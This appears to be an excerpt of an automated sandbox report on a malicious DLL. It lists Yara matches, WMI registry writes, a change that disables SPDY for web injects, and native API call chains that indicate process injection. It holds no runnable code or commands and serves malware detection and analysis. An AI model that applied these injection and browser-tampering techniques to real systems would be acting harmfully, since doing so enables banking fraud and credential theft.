                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
                      Source: Yara matchFile source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
                      Disables SPDY (HTTP compression, likely to perform web injects)Show sources
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B2274
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD2654
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD7E30
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD4FA7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04572C07
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04572499
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04565518
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0456AD2E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457C5F4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04574658
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0456279B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_045788BB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0456E9BD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04564AFE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_045852A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04582339
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB2499
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB2C07
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BBC5F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BAAD2E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA5518
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB4658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA279B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB88BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BAE9BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BC52A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA4AFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BC2339
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04A77E30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04A72654
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04A74FA7
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093F2F0
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093B530
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093179C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0094508C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_009340B4
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0094E0CF
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00923804
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0092E008
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00937834
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0094C874
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00929074
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00933074
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00944988
                      Source: C:\Windows\System32\control.exeCode function: 34_2_009459A8
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093D9AC
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093C1D4
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0092B1D8
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093C9F0
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093D150
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0094D2DC
                      Source: C:\Windows\System32\control.exeCode function: 34_2_009432EC
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00938218
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00937278
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0094AA6C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00926A68
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00939268
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0094EB10
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00936B1C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00922B74
                      Source: C:\Windows\System32\control.exeCode function: 34_2_009464F4
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00933C24
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00930474
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093ED94
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0094DD9C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_009385CC
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00938DF4
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00949524
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00937D44
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093FD6C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0092C6F4
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00946E34
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00928628
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0092779C
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093DFB8
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00943F08
                      Source: C:\Windows\System32\control.exeCode function: 34_2_00939770
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DF2F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DB530
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67C6A68
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67EEB10
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67E3F08
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67CC6F4
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67E32EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67ED2DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67C2B74
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D9770
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D6B1C
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67CE008
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67C3804
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DDFB8
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67C779C
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D179C
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67E508C
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67EC874
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67C9074
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D3074
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D0474
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D7834
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D3C24
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67E64F4
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67EE0CF
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D40B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67E4988
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DFD6C
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DD150
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D7D44
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67E9524
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D8DF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DC9F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67CB1D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DC1D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D85CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DD9AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67E59A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67EDD9C
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DED94
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D7278
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67EAA6C
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D9268
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67E6E34
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67C8628
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67D8218
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_009788BB
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0096E9BD
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_009852A0
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00964AFE
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00982339
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00972499
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00972C07
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0097C5F4
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00965518
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0096AD2E
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00974658
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0096279B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0456D1F8 CreateProcessAsUserW,
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: mspdb140.dll
                      Source: data.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B121F NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B1A1C SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B2013 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B2495 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD22EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD3C64 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD37E0 NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD8055 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0456DE77 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04566EB0 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04567FDD RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04570FA5 NtQueryInformationProcess,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_045692F3 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04575AED memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04561305 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04577419 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457A42B NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_045736C0 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04576F70 NtQuerySystemInformation,RtlNtStatusToDosError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04564851 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0456D812 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0456D00C memset,NtQueryInformationProcess,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04564173 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04579180 NtGetContextThread,RtlNtStatusToDosError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0457DBCE NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BBA42B NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA6EB0 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB969C memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BADE77 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB0FA5 NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA7FDD RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB680B NtMapViewOfSection,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA4173 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA92F3 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB5AED memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BBA21F GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA1305 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB7419 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB36C0 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB6F70 NtQuerySystemInformation,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BAD812 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BAD00C memset,NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA4851 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BB9180 NtGetContextThread,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BBDBCE NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
